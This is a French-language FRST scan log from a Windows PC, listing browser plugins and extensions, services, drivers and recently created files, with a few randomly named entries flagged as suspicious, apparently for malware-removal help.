FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-07-29] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-1452226929-484460335-584983045-1001: SkypePlugin -> C:\Users\lenor\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi.dll [2017-04-18] (Microsoft Corporation -> Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1452226929-484460335-584983045-1001: SkypePlugin64 -> C:\Users\lenor\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi-x64.dll [2017-04-18] (Microsoft Corporation -> Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1452226929-484460335-584983045-1001: www.wansview.com/HYPlayer -> C:\Program Files (x86)\HYPlayer\npHYPlayer.dll [2016-09-22] (IPC) [Fichier non signé]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.fr/
CHR StartupUrls: Default -> "hxxp://www.google.fr/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/"
CHR NewTab: Default -> "active": true,
"entry": "chrome-extension://pilplloabdedfmialnfchjomjmpjcoej/index.html"
,
"active": false,
"entry": "chrome-extension://ilnidodcffjfecahcfiihlhiohnaobic/index.html"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default [2019-04-22]
CHR Extension: (Slides) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-21]
CHR Extension: (Docs) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-21]
CHR Extension: (Google Drive) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-21]
CHR Extension: (YouTube) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-21]
CHR Extension: (Bing) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmkckgpgekmanipelfidlhmkfcjicion [2019-03-23]
CHR Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2019-04-20]
CHR Extension: (Adobe Acrobat) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-04-02]
CHR Extension: (Sheets) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-21]
CHR Extension: (Google Docs hors connexion) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-21]
CHR Extension: (Lookup Pro) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghdonojphkbfhdccpohfhckojkpfanlg [2019-03-19]
CHR Extension: (AdBlock) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-04-13]
CHR Extension: (Avast Online Security) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2019-03-19]
CHR Extension: (chrome_filter) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\hfnonpaclhjinjjdaacgdackchjkaakk [2019-03-19]
CHR Extension: (Secured Search) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ilnidodcffjfecahcfiihlhiohnaobic [2019-03-23]
CHR Extension: (Google Maps) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2019-02-21]
CHR Extension: (Allo-pages - Offres shopping) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgobcidghicodcnblfodnkjiplegjaho [2019-02-21]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-21]
CHR Extension: (Search Manager) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pilplloabdedfmialnfchjomjmpjcoej [2019-04-11]
CHR Extension: (Gmail) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-21]
CHR Extension: (Chrome Media Router) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-21]
CHR Extension: (System Table) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0 [2019-03-19]
CHR Profile: C:\Users\lenor\AppData\Local\Google\Chrome\User Data\System Profile [2019-04-22]
CHR Extension: (chrome_filter) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\hfnonpaclhjinjjdaacgdackchjkaakk [2019-03-19]
CHR HKLM\...\Chrome\Extension: [ilnidodcffjfecahcfiihlhiohnaobic] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bmkckgpgekmanipelfidlhmkfcjicion] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ilnidodcffjfecahcfiihlhiohnaobic] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2017-11-01]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ilnidodcffjfecahcfiihlhiohnaobic] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2917864 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2709480 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [560544 2017-10-13] (Advanced Micro Devices, Inc. -> AMD)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2018-08-23] (Apple Inc. -> Apple Inc.)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [3644008 2018-12-17] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [526376 2017-09-21] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S2 KMS-R@1n; C:\Windows\***@*** [26112 2019-02-21] () [Fichier non signé]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 LMIRescue_def44806-347d-3fb3-3647-c355e9c73281; C:\Program Files (x86)\LogMeIn Rescue Applet\LMIR102F3001.tmp\LMI_Rescue_srv.exe [3778520 2019-05-09] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 N2IxOTkwZDM3; C:\Program Files\N2IxOTkwZDM3\MWFlM2.exe [1850296 2019-04-20] (technologiejarbon.com -> ) <==== ATTENTION
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390672 2012-08-08] (CyberLink -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5382448 2019-05-09] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2018-03-01] (TeamViewer GmbH -> TeamViewer GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [41952 2016-10-27] (VIA Technologies, Inc -> VIA Technologies, Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\NisSrv.exe [3851264 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MsMpEng.exe [118144 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
===================== Pilotes (Avec liste blanche) ======================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0318486.inf_amd64_11ba0b4b7cc81d52\atikmdag.sys [38774688 2017-10-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0318486.inf_amd64_11ba0b4b7cc81d52\atikmpag.sys [549792 2017-10-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-04-26] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2017-09-16] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2017-09-16] (Disc Soft Ltd -> Disc Soft Ltd)
R3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [45680 2017-06-29] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R3 MTsensor; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [17280 2013-05-17] (ASUSTeK Computer Inc. -> )
R1 NGZiZDgzY; C:\Windows\system32\drivers\NGZiZDgzY [78208 2019-04-20] (technologiejarbon.com -> ) <==== ATTENTION
R1 NTgzYTk2Yj; C:\WINDOWS\system32\drivers\NTgzYTk2Yj [124576 2019-01-22] (chavanactechnology.com -> )
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [1009128 2017-08-21] (Realtek Semiconductor Corp. -> Realtek )
R3 SNP2STD; C:\WINDOWS\system32\DRIVERS\snp2sxp.sys [12342656 2007-04-09] (Microsoft Windows Hardware Compatibility Publisher -> )
R3 SNP2STD; C:\Windows\SysWOW64\DRIVERS\snp2sxp.sys [12039552 2007-04-09] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2017-10-10] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 VBoxDrv; C:\WINDOWS\system32\drivers\VBoxDrv.sys [68288 2019-01-22] (innotek GmbH -> )
R3 VIAHdAudAddService; C:\WINDOWS\system32\drivers\viahduaa.sys [709856 2016-10-27] (VIA Technologies Inc. -> VIA Technologies, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46472 2019-04-23] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [344544 2019-04-23] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60896 2019-04-23] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2019-05-10 09:12 - 2019-05-10 09:14 - 000037716 _____ C:\Users\lenor\Downloads\FRST.txt
2019-05-10 09:12 - 2019-05-10 09:12 - 002430976 _____ (Farbar) C:\Users\lenor\Downloads\FRST64.exe
2019-05-10 09:12 - 2019-05-10 09:12 - 000000000 ____D C:\FRST
2019-05-09 21:57 - 2019-05-09 21:57 - 001214008 _____ (Google LLC) C:\Users\lenor\Downloads\ChromeSetup(2).exe
2019-05-09 21:39 - 2019-05-09 21:39 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2019-05-09 21:38 - 2019-05-09 21:20 - 000000000 ____D C:\Windows.old
2019-05-09 21:36 - 2019-05-09 21:36 - 000000290 __RSH C:\Users\lenor\ntuser.pol
2019-05-09 21:36 - 2019-05-09 21:36 - 000000020 ___SH C:\Users\lenor\ntuser.ini
2019-05-09 21:19 - 2019-05-09 21:20 - 000003318 _____ C:\WINDOWS\System32\Tasks\Yahoo! Powered rocim
2019-05-09 21:19 - 2019-05-09 21:20 - 000002854 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-1006
2019-05-09 21:19 - 2019-05-09 21:20 - 000002854 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-1004
2019-05-09 21:19 - 2019-05-09 21:20 - 000002854 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-1001
2019-05-09 21:19 - 2019-05-09 21:20 - 000002850 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-500
2019-05-09 21:19 - 2019-05-09 21:20 - 000002844 _____ C:\WINDOWS\System32\Tasks\***@***
2019-05-09 21:19 - 2019-05-09 21:20 - 000002234 _____ C:\WINDOWS\System32\Tasks\{1E3119E5-1603-4913-A777-A1C5DF1CA0CE}
2019-05-09 21:19 - 2019-05-09 21:20 - 000002216 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-05-09 21:19 - 2019-05-09 21:19 - 000003920 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player NPAPI Notifier
2019-05-09 21:19 - 2019-05-09 21:19 - 000003618 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2019-05-09 21:19 - 2019-05-09 21:19 - 000003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2019-05-09 21:19 - 2019-05-09 21:19 - 000002988 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-05-09 21:19 - 2019-05-09 21:19 - 000002874 _____ C:\WINDOWS\System32\Tasks\YoutubeDownloader
2019-05-09 21:19 - 2019-05-09 21:19 - 000002702 _____ C:\WINDOWS\System32\Tasks\GarminUpdaterTask
2019-05-09 21:19 - 2019-05-09 21:19 - 000002548 _____ C:\WINDOWS\System32\Tasks\AutoPico Daily Restart
2019-05-09 21:19 - 2019-05-09 21:19 - 000002486 _____ C:\WINDOWS\System32\Tasks\wKernelCrash
2019-05-09 21:19 - 2019-05-09 21:19 - 000002456 _____ C:\WINDOWS\System32\Tasks\Chameleon Folder-lenor
2019-05-09 21:19 - 2019-05-09 21:19 - 000002220 _____ C:\WINDOWS\System32\Tasks\{6C77685D-7F00-4C1E-AEE5-91A62F78D5AD}
2019-05-09 21:19 - 2019-05-09 21:19 - 000002218 _____ C:\WINDOWS\System32\Tasks\{3F7FF5BB-9B22-444D-872C-B464C65A7AFA}
2019-05-09 21:19 - 2019-05-09 21:19 - 000002146 _____ C:\WINDOWS\System32\Tasks\StartCN
2019-05-09 21:19 - 2019-05-09 21:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\S-1-5-21-1452226929-484460335-584983045-1001
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\R@1n-KMS
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\Avast Software
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\Apple
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\{3A287BE1-DB6C-4695-C936-524D55D6CD02}
2019-05-09 21:15 - 2019-05-09 21:18 - 000015243 _____ C:\WINDOWS\diagwrn.xml
2019-05-09 21:15 - 2019-05-09 21:18 - 000015243 _____ C:\WINDOWS\diagerr.xml
2019-05-09 21:03 - 2019-05-09 21:57 - 001771406 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-05-09 20:53 - 2019-05-09 20:53 - 000001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2019-05-09 20:48 - 2019-05-09 21:36 - 000000000 ____D C:\Users\lenor
2019-05-09 20:48 - 2019-05-09 21:03 - 000000000 ____D C:\Users\teste1
2019-05-09 20:48 - 2019-05-09 21:02 - 000000000 ____D C:\Users\Administrateur
2019-05-09 20:48 - 2019-05-09 20:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2019-05-09 20:48 - 2019-05-09 20:48 - 000000000 ____D C:\Program Files (x86)\AMD
2019-05-09 20:48 - 2018-09-15 09:29 - 000001105 _____ C:\Users\teste1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-05-09 20:48 - 2018-09-15 09:29 - 000001105 _____ C:\Users\lenor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-05-09 20:48 - 2018-09-15 09:29 - 000001105 _____ C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-05-09 20:44 - 2019-05-09 20:44 - 000000000 ____D C:\ProgramData\USOShared
2019-05-09 20:44 - 2019-03-12 08:31 - 002865152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2019-05-09 20:40 - 2019-05-09 21:35 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-05-09 20:40 - 2019-05-09 20:58 - 000466904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-05-09 20:36 - 2019-05-09 20:36 - 000000724 _____ C:\Users\lenor\AppData\Local\LMIR107EB001.tmp.bat
2019-05-09 20:36 - 2019-05-09 20:36 - 000000528 _____ C:\Users\lenor\AppData\Local\LMIR107EB001.tmp_r.bat
2019-05-09 20:20 - 2019-05-09 21:38 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2019-05-09 20:19 - 2019-05-09 20:20 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2019-05-09 20:14 - 2019-05-09 20:14 - 026810880 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 023441920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 020815360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 019025408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 012844032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 012140032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 008898048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 007919104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 007877120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 006071296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 005436904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 004660224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 004488192 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003904512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003690496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003602944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tellib.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003551112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003442176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003421696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003406848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002942464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002393088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002205184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001521664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001459080 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001309696 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001297120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001294520 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001259320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-05-09 20:14 - 2019-05-09 20:14 - 001072424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001047552 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001019392 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000897536 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000815616 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000793600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000772608 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000740352 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscsvc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000695296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2019-05-09 20:14 - 2019-05-09 20:14 - 000684032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000666624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000663552 _____ (Microsoft Corporation) C:\WINDOWS\system32\objsel.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedRealitySvc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\AssignedAccessManager.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2019-05-09 20:14 - 2019-05-09 20:14 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000464384 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpshell.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000454144 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxdiag.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpinit.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000317240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mssecflt.sys
